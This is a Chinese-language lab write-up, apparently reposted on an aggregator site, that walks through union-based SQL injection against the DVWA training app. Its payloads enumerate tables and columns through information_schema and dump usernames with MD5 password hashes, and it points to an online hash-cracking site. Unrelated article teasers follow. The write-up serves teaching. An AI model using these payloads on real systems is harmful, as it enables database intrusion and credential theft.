SQL注入一般过程

实验:Vulnerability: SQL Injection(low)

SQL注入一般过程
1.判断注入点
一般和数据库进行交互的位置
2.判断注入点类型
字符型判断:
1'   报错
1' and '1'='2  错误结果
1' and '1'='1  正确结果
数字型判断:
1'   报错
1 and 1=2  错误结果
1 and 1=1  正确结果
3.获取数据回显位置
3.1 判断返回字段数
两种方式判断:1.order by 2. union select
1' order by 1# 正确显示结果
1' order by 2# 正确显示结果
1' order by 3# 报错
判断返回结果有两列。
3.2 判断回显位置
1' union select 1#  报错
1' union select 1,2#  正确显示,并成功显示回显位置
4.查询数据库名
database() 获取数据库名,user()获取用户名
1' union select database(),user() #
5.获取表名
数据库:information_schema
数据表:information_schema.tables
字段:table_schema = 'dvwa'
通过上面的内容查询表名,table_name
-1' union select 1,table_name from information_schema.tables
where table_schema=database()#
报错:
Illegal mix of collations for operation 'UNION'  编码错误
三种方式解决:
1.变成16进制输出
-1' union select 1,hex(table_name) from information_schema.tables
where table_schema=database()#
2.输出指定字符集
-1' union select 1,table_name collate utf8_general_ci from information_schema.tables
where table_schema=database()#
3.直接修改数据库字符集

查询结果可能只显示一条,因此使用group_concat()函数,将结果进行聚合
-1' union select 1,group_concat(table_name) collate utf8_general_ci from information_schema.tables
where table_schema=database()#
查询结果为:guestbook,users
5.查询字段名
数据库:information_schema
表:information_schema.columns
条件字段:table_schema='dvwa',table_name='users'
查询内容:column_name

-1' union select 1,group_concat(column_name) collate utf8_general_ci from information_schema.columns
where table_schema=database() and table_name='users'#
查询结果: user_id,first_name,last_name,user,password,avatar,last_login,failed_login
6.查询数据
查询表:users
查询字段:user,password
-1' union select 1,group_concat(user,'~',password) from users#
查询结果:admin~5f4dcc3b5aa765d61d8327deb882cf99,gordonb~e99a18c428cb38d5f260853678922e03,1337~8d3533d75ae2c3966d7e0d4fcc69216b,pablo~0d107d09f5bbe40cade3de5c71e9e9b7,smithy~5f4dcc3b5aa765d61d8327deb882cf99
MD5在线解密:
https://www.cmd5.com/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/213638.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【SpringBoot教程】SpringBoot 实现前后端分离的跨域访问(CORS)

作者简介:大家好,我是撸代码的羊驼,前阿里巴巴架构师,现某互联网公司CTO 联系v:sulny_ann(17362204968),加我进群,大家一起学习,一起进步,一起对抗…

【毕业季|进击的技术er】作为一名职场人,精心总结的嵌入式学习路线图

活动地址:毕业季进击的技术er 文章目录 0、作者介绍1、前言2、嵌入式基础必备知识2.1、学习内容2.2、学习建议2.3、学习资料 3、嵌入式入门篇——51单片机3.1、学习内容3.2、学习建议3.3、学习资料 4、STM32进阶篇4.1、学习内容4.2、学习建议4.3、学习资料 5、小而美…

印刷包装企业做什么认证才有优势

最近几年,外贸出口过程中,越来越多的印刷和包装企业被客户要求进行各类认证和审核,比如,产品印刷包装/吊牌等。他们已经意识到,印刷包装供应商对于整个供应链管理的重要性,尤其是那些明确标示了…

由pandas.loc引发的未知错误AttributeError: ‘str‘ object has no attribute ‘isna‘

由于data.loc[value]和 data[data.keyvalue] 这两者之间有一定的差异,第一种方式返回的可能是series,第二种方式返回的是dataframe,所以在做复杂条件筛选的的时候,可能会爆str相关的错误。 例如: account_instal[(ac…

嵌入式开发按怎样的路线学习较好?

嵌入式开发按怎样的路线学习较好? 在开始前我有一些资料,是我根据自己从业十年经验,熬夜搞了几个通宵,精心整理了一份「嵌入式从专业入门到高级教程工具包」,点个关注,全部无偿共享给大家!&…

mysql的行锁具体是怎么工作的

mysql行级锁是怎么工作的? 加锁的对象是索引,加锁的基本单位是 next-key lock。在能使用记录锁或者间隙锁就能避免幻读现象的场景下, next-key lock 就会退化成记录锁或间隙锁。 锁的范围,总结一下就是,对于唯一索引&a…

张驰咨询:掌握流程改进的关键,深入了解六西格玛绿带培训

尊敬的读者,当您寻求提升个人能力,加强企业流程管理时,六西格玛绿带培训无疑是您的不二选择。本文将带您深入了解六西格玛绿带培训的核心内容、必备工具和实际案例,以助您在职业生涯中一帆风顺。 六西格玛绿带培训主要针对中层管…

C++- 格式化输出

1.常规–格式化输出 %d //整型输出 %ld //长整型输出 %o //以八进制数形式输出整数 %x //以十六进制数形式输出整数,或输出字符串的地址 %u //以十进制数输出unsigned型数据(无符号数)注意&…

element 点击button弹出图片 运用自带隐藏的图片查看器el-image-viewer浏览图片

最近在开发一个图片预览效果,由于位置有限,没有原始的缩略图。 看了下elementUI的文档,基本都是需要有缩略图的情况下,才能有放大的图。 所以网上找了下有个不错的方案,其实也是elementUI自带的功能,只是AP…

论文查重怎么找到需要更改的【详细说明】

大家好,今天来聊聊论文查重怎么找到需要更改的,希望能给大家提供一点参考。 以下是针对论文重复率高的情况,提供一些修改建议和技巧: 论文查重怎么找到需要更改的 论文查重是保证学术诚信和提高论文质量的重要环节小发猫伪原创。…

班级管理的重要性

班级管理,就像是一座桥,连接着学生和老师,它的重要性不言而喻。 营造良好的学习氛围 班级管理不仅仅是维护秩序,更是营造一个积极向上的学习氛围。一个好的班级管理,能让学生更加专注于学习,提高学习效率。…

Linux上的MAC地址欺骗

Linux上的MAC地址欺骗 1、查看mac地址法1:ifconfig法2:ip link show 2、临时性改变 MAC 地址法1:使用iproute2工具包法2:使用macchanger工具 3、永久性改变 MAC 地址3.1 在 Fedora、RHEL下实践3.2 在 Debian、Ubuntu、Linux Mint下…

人工智能革命近在咫尺:利用数据实现社会影响、增强决策力和新机遇

人工智能(AI)是指由计算机系统或机器执行的智能行为,如学习、推理和解决问题。人工智能不再是科幻小说中的事物,而是已经成为我们日常生活中不可或缺的一部分。从语音助手到自动驾驶汽车,从人脸识别到机器翻译&#xf…

数据结构之----原码、反码、补码

数据结构之----原码、反码、补码 什么是原码? 原码:我们将数字的二进制表示的最高位视为符号位,其中 0 表示正数,1 表示负数,其余位表示数字 的值。 什么是反码? 反码:正数的反码与其原码相…

网络攻击(二)--情报搜集阶段

4.1. 概述 在情报收集阶段,你需要采用各种可能的方法来收集将要攻击的客户组织的所有信息,包括使用社交网络、Google Hacking技术、目标系统踩点等等。 而作为渗透测试者,你最为重要的一项技能就是对目标系统的探查能力,包括获知…

文生图:AE/VAE/VQVAE/VQGAN/DALLE模型

文生图模型演进:AE、VAE、VQ-VAE、VQ-GAN、DALL-E 等 8 模型本文中我们回顾了 AE、VAE、VQ-VAE、VQ-VAE-2 以及 VQ-GAN、DALL-E、DALL-E mini 和 CLIP-VQ-GAN 等 8 中模型,以介绍文生图模型的演进。https://mp.weixin.qq.com/s/iFrCEpAJ3WMhB-01lZ_qIA 1…

pta模拟题(7-38 完全二叉树的层序遍历)

一个二叉树,如果每一个层的结点数都达到最大值,则这个二叉树就是完美二叉树。对于深度为 D 的,有 N 个结点的二叉树,若其结点对应于相同深度完美二叉树的层序遍历的前 N 个结点,这样的树就是完全二叉树。 给定一棵完全…

GaussDB数据库语法及gsql入门

一、GaussDB数据库语法入门 之前我们讲了如何连接数据库实例,那连接数据库后如何使用数据库呢?那么我们今天就带大家了解一下GaussDB,以下简称GaussDB的基本语法。 关于如何连接数据库,请戳这里。 学习本节课程之后&#xff0c…

【开题报告】基于SpringBoot的消防知识科普平台的设计与实现

1.选题背景 消防知识科普平台的设计与实现是为了提高公众对于消防安全的认知和应对能力,促进社会消防文化的普及和发展。在中国,火灾事故时有发生,造成了重大人员伤亡和财产损失。因此,建立一个基于Spring Boot的消防知识科普平台…

docker---网络

docker的网络模式: 1、桥接模式:创建docker时不需要指定网络类型,默认模式。 2、host模式: 容器将不会虚拟出自己的网卡,也没有自己的ip地址,全部使用宿主机的ip和端口。 3、container模式:容器和容器之间…